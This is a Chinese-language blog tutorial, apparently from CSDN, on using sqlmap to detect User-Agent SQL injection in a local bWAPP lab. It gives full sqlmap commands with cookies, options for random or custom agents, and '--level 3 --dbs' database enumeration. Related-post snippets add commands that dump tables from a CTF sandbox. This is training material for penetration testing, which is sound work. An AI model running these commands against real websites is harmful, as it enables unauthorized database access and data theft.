使用sqlmap的 ua注入

最新推荐文章于 2024-04-08 20:37:06 发布
最新推荐文章于 2024-04-08 20:37:06 发布
阅读量1k 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/133458805
版权

文章目录


测试环境:bWAPP SQL Injection - Stored (User-Agent)
在这里插入图片描述

1.使用sqlmap自带UA头的检测

python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch
在这里插入图片描述

然后刷新看网页,发现使用了sqlmap自带的UA头
在这里插入图片描述

2.使用sqlmap随机提供的UA头

加入–random-agent参数
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --random-agent --batch
在这里插入图片描述

再看网页,可以发现已经没有sqlmap的字样了
在这里插入图片描述

3.使用自己写的UA头

使用–user-agent="1234567"自己给他指定UA头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --user-agent=“1234567” --batch
在这里插入图片描述

再看页面变化,已经变成了我们指定的UA头了
在这里插入图片描述

4.调整level检测

由于sqlmap默认level不支持ua注入,需调整至level=3才能检测到ua头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch -f -b --dbs --level 3
可以发现已经可以找到注入点,使用-f -b可以更详细的找出环境系统版本
在这里插入图片描述

只为了拿0day
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap笔记
m0_47599604的博客
03-13 532
SQLmap简介与配置 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据库提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,他支持以下几种独特的输入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入; 基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假; 基于报错的注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中,比如数据库报错的信息等; 联合查询注入,即可以使用union的情况下注入; 堆叠查询注入,即可以..
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
Sqlmap使用
niqiu320的博客
04-23 569
SQLMAP简介与配置 SQLMap是一款由Python2开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Sever、Access、IBM DB2、SQLite等数据库。 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持一下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入。 基于
sql学习5(cookie注入UA注入,refer注入,过滤空格)
最新发布
cyy001128的博客
04-08 1051
获取cookie可免密登录管理员账户Cookie通常被用来辨别用户身份,就是保存用户的账号和密码用来自动登录网站cookie注入的基本条件:使用了request方法,但是注入保护程序中只对get\post方法提交的数据进行了过滤。
注入工具 -- sqlmap(设置请求参数)
weixin_41489908的博客
12-24 2453
我希望我是那种你一见面就觉得心动的人,而不是在权衡利弊后觉得还不错的人。。。 一、抓包 二、设置提交参数 sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111&passwd=222222222&submit=Submit” --baner 三、多个参数,指定分隔符...
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
使用SQLmap进行UA注入(User-Agent注入
zyx_aplomb的博客
08-29 602
使用sqlmap进行UA注入时的一些关键点
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQLMAP注入教程
wzj的博客
09-03 343
sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。所谓SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求查询的字符串,最终达到欺骗服务器执行恶意的SQL命令,假如管理员没有对id参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询.sqlmap常用命令。-u 指定目标url。-d 直接连接数据库。
sqlmap基本使用方法
qq_54030686的博客
06-28 3349
本文只介绍sqlmap的简单使用方法,参考官方文档csdn师傅个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限GET型 输入自己的目标地址 自动输入选项的属性值 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入 POST型 可以获取对应地址的请求包,使用bp抓包保存即可 或者 选择传参的方式 选择传入的参数 采用随机UA头 查看当
SQL注入经验方法总结
太阳照耀我走四方
07-02 1324
SQL注入经验方法总结
SQLMAP注入使用
05-13
SQLMAP注入使用
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
SQLMAP详细介绍之参数详解
yuchen的博客
01-16 1743
SQLMAP参数详解option 选项target 目标Request 请求Optimization 优化Injection 注入Detection 侦察Techniques 技巧Fingerprint 指纹Enumeration 枚举Brute force 暴力User-defined function injection 用户自定义注入函数File system access 访问文件系统Operating system access 操作系统连接windows 注册表连接通用参数和混杂选项 optio
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap 笔记
YouthBelief的博客
10-09 403
sqlmap一、指定目标二、请求三、注入四、操作系统控制sqlmap请求过快被封 解决办法sqlmap与burp联动使用脚本 一、指定目标 1.指定url -u "rul" 2.指定burp代理日志 -l proxy.log 3.从文件中解析目标 -m url.txt 4.从文件载入http请求 bp抓包 保存 -r test.txt 二、请求 1.put请求 -method=PUT 2.post数据 -data="id=1&username=admin" 3.指定分隔符 默认 &为 分
sqlmap使用:ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入
NSQ0207的博客
07-20 445
CTFHub靶场+cookie注入+查询UA注入+Refer注入
UA注入 sqlmap
07-31
UA注入是一种常见的Web应用程序漏洞,它利用了用户代理(User-Agent)字段中的恶意输入来执行SQL注入攻击。通过在User-Agent字段中注入恶意的SQL语句,攻击者可以绕过应用程序的输入验证,直接与数据库进行交互,并获取敏感信息或者修改数据库内容。 为了利用UA注入漏洞,可以使用sqlmap工具。根据引用[1]和引用[2]提供的信息,可以使用以下命令来执行UA注入的SQL注入攻击: 1. 使用level 3的参数来指定注入的等级:python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs 2. 使用-D参数指定数据库名称,-T参数指定表名,--columns参数列出所有字段:python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T asqmhkqrnf --columns --dump ***

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值